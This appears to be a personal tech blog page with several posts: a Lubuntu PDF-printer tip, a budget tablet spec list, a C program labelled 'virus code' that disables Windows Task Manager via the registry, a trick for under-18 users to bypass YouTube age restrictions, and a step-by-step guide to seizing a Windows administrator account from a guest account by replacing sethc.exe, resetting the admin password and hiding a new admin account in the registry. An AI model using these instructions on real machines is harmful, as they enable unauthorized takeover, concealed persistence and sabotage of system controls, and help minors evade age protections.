Saturday, February 9, 2013

How to convert any printable file into pdf in lubutu 12.01

hey friends i am using Lubuntu 12.01 which is best linux distro for low config. system as my old laptop has only 512Mb of RAM but Lubutu is working very fine on this system. I tried many different O.S. on this system like Windows XP, WIN 7, Mint, Fedora but my choice is Lubuntu because of its simplicity and low requirement of memory just only 100 Mb approx.

Today I tried to find out some alternative to cute pdf like in Windows OS for virtual printer to convert printable file into .pdf extension so that I can take printout from outside. So here are two simple steps of doing this

step 1 : go to terminal and type the below line

                  sudo apt-get install cups-pdf

it will install a virtual printer in your system 




step 2 : select a file to print & press "CTRL+P" to print as usually you   do select the option pdf and press print and your .pdf file is ready. 

  

                                

Sunday, January 6, 2013

budget tablet micromax infinity P275

hey friends recently I bought micromax infinity Funbook Model number P275 from Mobile Store at
Rs. 4500 only.I researched many budget tablet and after all my research, I finally bought this micromax amazing tablet.


specification:
processor : 1.2 Ghz Cortex A8
                   dual Mali -400 2d/3d Core for multimedia purpose
Android : 4.0 (ice Cream Sandwich)

Display Screen : 17.7 cm Capacitive Multi-touch, pinch to zoom

Camera : front 0.3 MP
                Rear 2 MP

Memory : 4Gb/ 512 MB ddr3
                 expandable upto 32 GB (actually they provided 4 GB memory Card with it and its internal         memory is 2 GB)

media : 1080p hd video mpeg2/4, AVI, WMV, MOV

Sensor : GRAVITY sensor and Accelerator Sensor

Battery : 40000 mAh

connectivity : Wifi and 3g dongle support ( dongle is not included in the box)

front stereo speaker sound quality is better than any other budget tablet under Rs.7000



Sunday, December 2, 2012

virus code that will disable task manager

WARNING : Only for Educational Purpose



#include<stdio.h>
void main()
{

system("REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /v DisableTaskMgr /t REG_DWORD /d 1");

}
compile it using any c compiler like dev C++ or turboo C








Saturday, November 17, 2012

Bypass youtube age limit

if you are under 18 and want to watch videos that require age 18+ in youtube this trick is for you.

I'll tell you easy way ,how to bypass that annoying age restriction on YT. For example ,image 16 years old boy ,who wants to see official LMFAO - I'm sexy and I know it video ,but he can't ,because of it's age limit. So he has 2 choice's ,1.) Create a new YT account ,where he false his age to 18+. 2.) He easily bypass the age limit. How? Read this tutorial >

1.) Search for video ,which has age restriction. For example the official LMFAO - I'm sexy and I know video.
2.) Right click the link and copy it.
(link http://www.youtube.com/watch?v=wyx6JDQCslE)
3.) Open copied link in new tab
4.) delete watch? and = part and add / symbol behind v letter.
5.) Press enter and enjoy

Final link will looks like this >
http://www.youtube.com/v/wyx6JDQCslE


enjoy

Friday, November 9, 2012

How To Hack An Administrator Account With A Guest Account

Prerequisites
Guest account with write access to system 32.
Here is how to do that -


* Go to C:/windows/system32
* Copy cmd.exe and paste it on desktop
* rename cmd.exe to sethc.exe
* Copy the new sethc.exe to system 32,when windows asks for overwriting the
file,then click yes.
When asked to overwrite, overwrite the sethc.exe
* Now Log out from your guest account and at the user select window,press shift key
5 times.
* Instead of Sticky Key confirmation dialog,command prompt with full administrator
privileges will open.



Press shift key 5 times and command prompt will open.
* Now type “ NET USER ADMINISTRATOR aaa” where “aaa” can be any password
you like and press enter.
* You will see “ The Command completed successfully” and then exit the command
prompt and login into administrator with your new password.
* Congrats You have hacked admin from guest account.
Further..
Also, you can further create a new user at the command prompt by typing “NET USER
Ephemeral /ADD” where “Ephemeral” is the username you would like to add with
administrator privileges. Then hide your newly created admin account by -

Go to registry editor by typing regedit in run and navigate to this key
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Winlogon\SpecialAccounts\UserList]
Here create a new DWORD value, write its name as the “user name” that u created
for your admin account and live with your admin account forever :)

Search This Blog